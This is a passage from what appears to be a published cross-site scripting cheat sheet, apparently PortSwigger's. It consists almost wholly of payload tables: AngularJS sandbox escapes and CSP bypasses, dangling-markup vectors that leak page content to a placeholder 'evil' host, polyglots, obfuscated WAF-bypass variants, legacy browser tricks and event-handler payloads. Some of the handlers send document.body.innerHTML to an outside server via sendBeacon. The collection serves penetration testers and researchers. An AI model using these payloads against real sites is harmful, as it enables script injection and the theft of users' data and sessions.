1.5.9 - 1.5.11 | Jan Horn (Google) | 517 | {{c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a;}}
>=1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}

DOM based AngularJS sandbox escapes (using orderBy or no $eval)

Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 | Jan Horn (Google) | 118 | a="constructor";b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,"alert(1)")()
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317 | {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20 | )))alert(1)
1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

AngularJS CSP bypasses

Version | Author | Length | Vector
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>

Scriptless attacks

Dangling markup

Background attribute | <body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?
Link href stylesheet | <link rel=stylesheet href="//evil?
Link href icon | <link rel=icon href="//evil?
Meta refresh | <meta http-equiv="refresh" content="0; http://evil?
Img to pass markup through src attribute | <img src="//evil? <image src="//evil?
Video using track element | <video><track default src="//evil?
Video using source element and src attribute | <video><source src="//evil?
Audio using source element and src attribute | <audio><source src="//evil?
Input src | <input type=image src="//evil?
Button using formaction | <form><button style="width:100%;height:100%" type=submit formaction="//evil?
Input using formaction | <form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?
Form using action | <button form=x style="width:100%;height:100%;"><form id=x action="//evil?
Object data | <object data="//evil?
Iframe src | <iframe src="//evil?
Embed src | <embed src="//evil?
Use textarea to consume markup and post to external site | <form><button formaction=//evil>XSS</button><textarea name=x>
Pass markup data through window.name using form target | <button form=x>XSS</button><form id=x action=//evil target="
Pass markup data through window.name using base target | <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
Pass markup data through window.name using formtarget | <form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
Using base href to pass data | <a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
Using embed window name to pass data from the page | <embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using iframe window name to pass data from the page | <iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using object window name to pass data from the page | <object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using frame window name to pass data from the page | <frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Overwrite type attribute with image in hidden inputs | <input type=hidden type=image src="//evil?

Polyglots

Polyglot payload 1 | javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Polyglot payload 2 | javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Polyglot payload 3 | javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>

WAF bypass global objects

XSS into a JavaScript string, string concatenation (window) | window["ale"+"rt"](window["doc"+"ument"]["dom"+"ain"])
XSS into a JavaScript string, string concatenation (self) | self["ale"+"rt"](self["doc"+"ument"]["dom"+"ain"])
XSS into a JavaScript string, string concatenation (this) | this["ale"+"rt"](this["doc"+"ument"]["dom"+"ain"])
XSS into a JavaScript string, string concatenation (top) | top["ale"+"rt"](top["doc"+"ument"]["dom"+"ain"])
XSS into a JavaScript string, string concatenation (parent) | parent["ale"+"rt"](parent["doc"+"ument"]["dom"+"ain"])
XSS into a JavaScript string, string concatenation (frames) | frames["ale"+"rt"](frames["doc"+"ument"]["dom"+"ain"])
XSS into a JavaScript string, string concatenation (globalThis) | globalThis["ale"+"rt"](globalThis["doc"+"ument"]["dom"+"ain"])
XSS into a JavaScript string, comment syntax (window) | window[/*foo*/"alert"/*bar*/](window[/*foo*/"document"/*bar*/]["domain"])
XSS into a JavaScript string, comment syntax (self) | self[/*foo*/"alert"/*bar*/](self[/*foo*/"document"/*bar*/]["domain"])
XSS into a JavaScript string, comment syntax (this) | this[/*foo*/"alert"/*bar*/](this[/*foo*/"document"/*bar*/]["domain"])
XSS into a JavaScript string, comment syntax (top) | top[/*foo*/"alert"/*bar*/](top[/*foo*/"document"/*bar*/]["domain"])
XSS into a JavaScript string, comment syntax (parent) | parent[/*foo*/"alert"/*bar*/](parent[/*foo*/"document"/*bar*/]["domain"])
XSS into a JavaScript string, comment syntax (frames) | frames[/*foo*/"alert"/*bar*/](frames[/*foo*/"document"/*bar*/]["domain"])
XSS into a JavaScript string, comment syntax (globalThis) | globalThis[/*foo*/"alert"/*bar*/](globalThis[/*foo*/"document"/*bar*/]["domain"])
XSS into a JavaScript string, hex escape sequence (window) | window["\x61\x6c\x65\x72\x74"](window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
XSS into a JavaScript string, hex escape sequence (self) | self["\x61\x6c\x65\x72\x74"](self["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
XSS into a JavaScript string, hex escape sequence (this) | this["\x61\x6c\x65\x72\x74"](this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
XSS into a JavaScript string, hex escape sequence (top) | top["\x61\x6c\x65\x72\x74"](top["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
XSS into a JavaScript string, hex escape sequence (parent) | parent["\x61\x6c\x65\x72\x74"](parent["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
XSS into a JavaScript string, hex escape sequence (frames) | frames["\x61\x6c\x65\x72\x74"](frames["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
XSS into a JavaScript string, hex escape sequence (globalThis) | globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
XSS into a JavaScript string, hex escape sequence and base64 encoded string (window) | window["\x65\x76\x61\x6c"](window["\x61\x6c\x65\x72\x74"](window["\x61\x74\x6f\x62"]("WFNT")))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (self) | self["\x65\x76\x61\x6c"](self["\x61\x6c\x65\x72\x74"](self["\x61\x74\x6f\x62"]("WFNT")))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (this) | this["\x65\x76\x61\x6c"](this["\x61\x6c\x65\x72\x74"](this["\x61\x74\x6f\x62"]("WFNT")))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (top) | top["\x65\x76\x61\x6c"](top["\x61\x6c\x65\x72\x74"](top["\x61\x74\x6f\x62"]("WFNT")))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (parent) | parent["\x65\x76\x61\x6c"](parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\x62"]("WFNT")))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (frames) | frames["\x65\x76\x61\x6c"](frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\x62"]("WFNT")))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (globalThis) | globalThis["\x65\x76\x61\x6c"](globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x61\x74\x6f\x62"]("WFNT")))
XSS into a JavaScript string, octal escape sequence (window) | window["\141\154\145\162\164"]("\130\123\123")
XSS into a JavaScript string, octal escape sequence (self) | self["\141\154\145\162\164"]("\130\123\123")
XSS into a JavaScript string, octal escape sequence (this) | this["\141\154\145\162\164"]("\130\123\123")
XSS into a JavaScript string, octal escape sequence (top) | top["\141\154\145\162\164"]("\130\123\123")
XSS into a JavaScript string, octal escape sequence (parent) | parent["\141\154\145\162\164"]("\130\123\123")
XSS into a JavaScript string, octal escape sequence (frames) | frames["\141\154\145\162\164"]("\130\123\123")
XSS into a JavaScript string, octal escape sequence (globalThis) | globalThis["\141\154\145\162\164"]("\130\123\123")
XSS into a JavaScript string, unicode escape (window) | window["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
XSS into a JavaScript string, unicode escape (self) | self["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
XSS into a JavaScript string, unicode escape (this) | this["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
XSS into a JavaScript string, unicode escape (top) | top["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
XSS into a JavaScript string, unicode escape (parent) | parent["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
XSS into a JavaScript string, unicode escape (frames) | frames["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
XSS into a JavaScript string, unicode escape (globalThis) | globalThis["\u0061\u006c\u0065\u0072\u0074"]("\u0058\u0053\u0053")
XSS into a JavaScript string, RegExp source property (window) | window[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (self) | self[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (this) | this[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (top) | top[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (parent) | parent[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (frames) | frames[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (globalThis) | globalThis[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, Hieroglyphy/JSFuck (window) | window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (self) | self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (this) | this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (top) | top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (parent) | parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (frames) | frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (globalThis) | globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

Classic vectors (XSS crypt)

Image src with JavaScript protocol | <img src="javascript:alert(1)">
Body background with JavaScript protocol | <body background="javascript:alert(1)">
Iframe data URLs no longer work, as modern browsers use a null origin | <iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
VBScript protocol, used to work in IE | <a href=vbscript:MsgBox+1>XSS</a> <a href='' onclick=vbs:Msgbox+1>XSS</a> <a href='' onclick=VBS:Msgbox+1>XSS</a> <a href='' onclick=vbscript:Msgbox+1>XSS</a> <a href='' onclick=VBSCRIPT:Msgbox+1>XSS</a> <a href='' language=vbs onclick=vbscript:Msgbox+1>XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE | <a href='' onclick=jscript.compact:alert(1);>test</a> <a href='' onclick=JSCRIPT.COMPACT:alert(1);>test</a>
JScript.Encode allows encoded JavaScript | <a href='' language=JScript.Encode onclick=#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@>XSS</a> <a href='' onclick=JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@>XSS</a>
VBScript.Encode allows encoded VBScript | <iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@> <iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
JavaScript entities, used to work in Netscape Navigator | <a title="&{alert(1)}">XSS</a>
JavaScript stylesheets used to be supported by Netscape Navigator | <link href="xss.js" rel=stylesheet type="text/javascript">
Button used to consume markup | <form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup | <form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL, Firefox only <= 2 | <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="\-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
XBL also worked in FF 3.5 using data URLs | <img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)">
CSS expressions, <= IE7 | <div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio\006e(alert(1))> <div style=xss:expressio\00006e(alert(1))> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio&#x5c;6e(alert(1))>
In quirks mode IE allowed you to use = instead of : | <div style=xss=expression(alert(1))> <div style="color&#x3d;red">test</div>
Behaviors for older modes of IE | <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in functions | <script> function window.onload() { alert(1) } </script> 
<script> function window::onload() { alert(1) } </script> 
<script> function window.location() { } </script> 
<body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body> 
<body> <script> function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>" } </script> </body>
GreyMagic HTML+time exploit (no longer works, even in 5 docmode) | <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
Firefox allows NULLs after & | <a href="javascript:&#x6aavascript:alert(1)">Firefox</a>
Firefox allows NULLs inside named entities | <a href="javascript&colon;alert(1)">Firefox</a>
Firefox allows NULL characters inside opening comments | <!-- ><img title="--><iframe/onload=alert(1)>"> --> <!-- ><img title="--><iframe/onload=alert(1)>"> -->
Safari used to allow any tag to have an onload event inside SVG | <svg><xss onload=alert(1)>
Isindex using src attribute | <isindex type=image src="//evil?
Isindex using submit | <isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
Isindex and formaction | <isindex type=submit formaction=javascript:alert(1)>
Isindex and action | <isindex type=submit action=javascript:alert(1)>

Impossible labs

Title | Description | Length limit | Closest vector
Basic context, WAF blocks <[a-zA-Z] | This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour, and it's only known to be exploitable in old IE with <%tag. | N/A | N/A
Script-based injection, but quotes, forward slash and backslash are escaped | We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script-based context and the second in HTML. | N/A | N/A
innerHTML context, but no equals allowed | You have a site that processes the query string and URL-decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work, and we can't use = to create an event. | N/A | N/A
Basic context, length limit | This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q/oncut=alert``, but can you beat it? | 15 | <q oncut=alert``
Attribute context, length limit | The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it? | 14 | oncut=alert``
Basic context, length limit, arbitrary code | It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code. | 19 | <q/oncut=eval(name)
Attribute context, length limit, arbitrary code | Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute-based injection with arbitrary JavaScript. | 17 | See link
Injection occurs inside a frameset but before the body | We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy. | N/A | N/A
Injection occurs inside a single-quoted string; only the characters a-z0-9+` are allowed | The injection occurs within a single-quoted string, and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`. | N/A | N/A

Credits

Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.

This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.

Event handlers that do not require user interaction (continued)

Event | Description | Code

onbeforeunload | Fires if the URL changes, before the page unloads | <body onbeforeunload=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>
onbegin | Fires when an SVG animation begins | <svg><animate onbegin=alert(1) attributeName=x dur=1s>
onblur | Fires when an element loses focus | <a onblur=alert(1) tabindex=1 id=x></a><input autofocus>
onbounce | Fires when the marquee bounces | <marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>
oncanplay | Fires if the resource can be played | <audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
oncanplaythrough | Fires when enough data has been loaded to play the resource all the way through | <video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
oncuechange | Fires when a subtitle cue changes | <video controls><source src="validvideo.mp4" type="video/mp4"><track default oncuechange=alert(1) src="data:text/vtt,WEBVTT FILE 1 00:00:00.000 --> 00:00:05.000 <b>XSS</b> "></video>
ondeactivate | Fires when the element is deactivated | <xss id=x tabindex=1 ondeactivate=alert(1)></xss><input id=y autofocus>
ondurationchange | Fires when the duration changes | <audio controls ondurationchange=alert(1)><source src="validaudio.mp3" type="audio/mpeg"></audio>
onend | Fires when an SVG animation ends | <svg><animate onend=alert(1) attributeName=x dur=1s>
onended | Fires when the resource has finished playing | <audio controls autoplay onended=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onerror | Fires when the resource fails to load or causes an error | <audio src/onerror=alert(1)>
onfinish | Fires when the marquee finishes | <marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>
onfocus | Fires when the element has focus | <a id=x tabindex=1 onfocus=alert(1)></a>
onfocusin | Fires when the element has focus | <a id=x tabindex=1 onfocusin=alert(1)></a>
onfocusout | Fires when an element loses focus | <a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus>
onhashchange | Fires if the hash changes | <body onhashchange=alert(1)>
onload | Fires when the element is loaded | <body onload=alert(1)>
onloadeddata | Fires when the first frame is loaded | <audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onloadedmetadata | Fires when the metadata is loaded | <audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio>
onloadend | Fires when the element finishes loading | <image src="validimage.png" onloadend=alert(1)>
onloadstart | Fires when the element begins to load | <image src="validimage.png" onloadstart=alert(1)>
onmessage | Fires when a message event is received from a postMessage call | <body onmessage=alert(1)>
onpageshow | Fires when the page is shown | <body onpageshow=alert(1)>
onplay | Fires when the resource is played | <audio autoplay onplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onplaying | Fires when the resource is playing | <audio autoplay onplaying=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onpopstate | Fires when the history changes | <body onpopstate=alert(1)>
onprogress | Fires when the video/audio begins downloading | <audio controls onprogress=alert(1)><source src="validaudio.mp3" type="audio/mpeg"></audio>
onreadystatechange | Fires when the ready state changes | <applet onreadystatechange=alert(1)></applet>
onrepeat | Fires when an SVG animation repeats | <svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />
onresize | Fires when the window is resized | <body onresize=alert(1)>
onscroll | Fires when the page scrolls | <body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
onstart | Fires when the marquee starts | <marquee onstart=alert(1)>XSS</marquee>
ontimeupdate | Fires when the timeline is changed | <audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
ontoggle | Fires when the details tag is expanded | <details ontoggle=alert(1) open>test</details>
ontransitioncancel | Fires when a CSS transition cancels | <style>:target {color: red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=alert(1)></xss>
ontransitionend | Fires when a CSS transition ends | <style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionend=alert(1)></xss>
ontransitionrun | Fires when a CSS transition begins | <style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=alert(1)></xss>
ontransitionstart | Fires when a CSS transition starts | <style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionstart=alert(1)></xss>
onunhandledrejection | Fires when a promise rejection isn't handled | <body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
onunload | Fires when the page is unloaded | <body onunload=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>
onwaiting | Fires while waiting for data | <video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onwebkitanimationend | Fires when a CSS animation ends | <style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationend="alert(1)"></xss>
onwebkitanimationiteration | Fires when a CSS animation repeats | <style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration="alert(1)"></xss>
onwebkitanimationstart | Fires when a CSS animation starts | <style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart="alert(1)"></xss>
onwebkittransitionend | Fires when a CSS transition ends | <style>:target {color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)></xss>

Event handlers that do require user interaction

Event | Description | Code
onauxclick | Fires when right clicking or using the middle button of the mouse | <input onauxclick=alert(1)>
onbeforecopy | Requires you to copy a piece of text | <a onbeforecopy=alert(1) contenteditable>test</a>
onbeforecut | Requires you to cut a piece of text | <a onbeforecut=alert(1) contenteditable>test</a>
onbeforepaste | Requires you to paste a piece of text | <a onbeforepaste=alert(1) contenteditable>test</a>
onchange | Requires a change of value | <input onchange=alert(1) value=xss>
onclick | Requires a click on the element | <xss onclick="alert(1)">test</xss>
onclose | Fires when a dialog is closed | <dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
oncontextmenu | Triggered when right clicking to show the context menu | <xss oncontextmenu="alert(1)">test</xss>
oncopy | Requires you to copy a piece of text | <xss oncopy=alert(1) value="XSS" autofocus tabindex=1>test
oncut | Requires you to cut a piece of text | <xss oncut=alert(1) value="XSS" autofocus tabindex=1>test
ondblclick | Triggered when double clicking the element | <xss ondblclick="alert(1)" autofocus tabindex=1>test</xss>
ondrag | Triggered when dragging the element | <xss draggable="true" ondrag="alert(1)">test</xss>
ondragend | Triggered when dragging of the element finishes | <xss draggable="true" ondragend="alert(1)">test</xss>
ondragenter | Requires a mouse drag | <xss draggable="true" ondragenter="alert(1)">test</xss>
ondragleave | Requires a mouse drag | <xss draggable="true" ondragleave="alert(1)">test</xss>
ondragover | Triggered when dragging over an element | <div draggable="true" contenteditable>drag me</div><xss ondragover=alert(1) contenteditable>drop here</xss>
ondragstart | Requires a mouse drag | <xss draggable="true" ondragstart="alert(1)">test</xss>
ondrop | Triggered when dropping a draggable element | <div draggable="true" contenteditable>drag me</div><xss ondrop=alert(1) contenteditable>drop here</xss>
onfullscreenchange | Fires when a video changes full screen status | <video onfullscreenchange=alert(1) src="validvideo.mp4" controls>
oninput | Requires a change of value | <input oninput=alert(1) value=xss>
oninvalid | Requires a form submission with an element that does not satisfy its constraints, such as a required attribute | <form><input oninvalid=alert(1) required><input type=submit>
onkeydown | Triggered when a key is pressed | <xss onkeydown="alert(1)" contenteditable>test</xss>
onkeypress | Triggered when a key is pressed | <xss onkeypress="alert(1)" contenteditable>test</xss>
onkeyup | Triggered when a key is released | <xss onkeyup="alert(1)" contenteditable>test</xss>
onmousedown | Triggered when the mouse button is pressed | <xss onmousedown="alert(1)">test</xss>
onmouseenter | Triggered when the mouse is hovered over the element | <xss onmouseenter="alert(1)">test</xss>
onmouseleave | Triggered when the mouse is moved away from the element | <xss onmouseleave="alert(1)">test</xss>
onmousemove | Requires mouse movement | <xss onmousemove="alert(1)">test</xss>
onmouseout | Triggered when the mouse is moved away from the element | <xss onmouseout="alert(1)">test</xss>
onmouseover | Requires a hover over the element | <xss onmouseover="alert(1)">test</xss>
onmouseup | Triggered when the mouse button is released | <xss onmouseup="alert(1)">test</xss>
onmousewheel | Fires when the mouse wheel scrolls | <xss onmousewheel=alert(1)>requires scrolling
onmozfullscreenchange | Fires when a video changes full screen status | <video onmozfullscreenchange=alert(1) src="validvideo.mp4" controls>
